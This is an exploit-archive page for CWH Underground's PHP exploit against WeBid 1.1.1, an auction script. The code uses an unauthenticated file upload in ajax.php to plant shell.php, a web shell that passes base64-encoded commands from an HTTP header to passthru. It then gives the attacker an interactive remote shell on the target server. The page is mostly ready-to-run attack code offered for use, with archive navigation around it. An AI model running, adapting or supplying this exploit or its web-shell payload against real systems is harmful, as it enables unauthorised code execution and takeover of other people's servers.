WeBid 1.1.1 Unrestricted File Upload

WeBid 1.1.1 Unrestricted File Upload: Posted Feb 21, 2015; Authored by CWH Underground; WeBid version 1.1.1 suffers from an unrestricted file upload vulnerability.; tags | exploit, file upload; SHA-256 | 0a29501b52601df8e1a2c36d36023a6d23b42554cdc2393e27eeb09b58827dcd; Download | Favorite | View

WeBid 1.1.1 Unrestricted File Upload

<?php
  
/*
  
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /       
  / XXXXXX /
 (________(         
  `------'
   
 Exploit Title   : WeBid 1.1.1 Unrestricted File Upload Exploit
 Date            : 20 February 2015
 Exploit Author  : CWH Underground
 Site            : www.2600.in.th
 Vendor Homepage : http://www.webidsupport.com/
 Software Link   : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
 Version         : 1.1.1
 Tested on       : Window and Linux
   
   
#####################################################
VULNERABILITY: Arbitrary File Upload Vulnerability
#####################################################
   
/ajax.php
/inc/plupload/examples/upload.php
  
#####################################################
DESCRIPTION
#####################################################
   
This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the 
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
  
#####################################################
EXPLOIT
#####################################################
   
*/
  
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
  
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
   
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
  
print "\n+----------------------------------------+";
print "\n| WeBid Unrestricted File Upload Exploit |";
print "\n+----------------------------------------+\n";
   
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /WeBid/\n";
    die();
}
  
$host = $argv[1];
$path = $argv[2];
   
$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
$payload .= "shell.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet  = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

print "\n\nExploiting...";
sleep(2);
print "Waiting for shell...\n";
sleep(2);

http_send($host, $packet);
  
$packet  = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

   print "\n  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O   \n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
      
while(1)
{
    print "\nWebid-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>

Top Authors In Last 30 Days

Red Hat 250 files
Ubuntu 111 files
indoushka 49 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,085)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,603)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,724)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

WeBid 1.1.1 Unrestricted File Upload

WeBid 1.1.1 Unrestricted File Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WeBid 1.1.1 Unrestricted File Upload

Share This

WeBid 1.1.1 Unrestricted File Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems